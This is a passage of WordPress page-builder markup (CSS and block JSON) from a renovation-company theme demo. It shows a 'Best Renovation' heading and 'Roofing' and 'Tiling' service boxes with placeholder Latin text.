.skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-825826a4-2470-420b-8975-2a4a1a7868dd\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"c7afed5e-5df8-4702-b207-b6f377dbc6c4\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-c7afed5e-5df8-4702-b207-b6f377dbc6c4\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">We Provide the Best <br>Renovation</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"db861d8c-012c-44ce-a81f-cf42e03e55d4\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-db861d8c-012c-44ce-a81f-cf42e03e55d4 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"02f18288-ea6e-4eb1-a7da-8789d44dd963\"} -->\n<style type=\"text/css\"> .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-02f18288-ea6e-4eb1-a7da-8789d44dd963 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"3739cb8d-4f78-4247-ba9f-a12568b3ec04\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3739cb8d-4f78-4247-ba9f-a12568b3ec04\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"c1193a68-cc43-4e87-8114-cad0ca591e6a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"f669cc7b-733a-44ee-ac24-f2194c21d8fa\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f669cc7b-733a-44ee-ac24-f2194c21d8fa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"46f78be9-957d-405f-b7f8-a348f80cff99\"} -->\n<style type=\"text/css\"> .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Tiling</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" 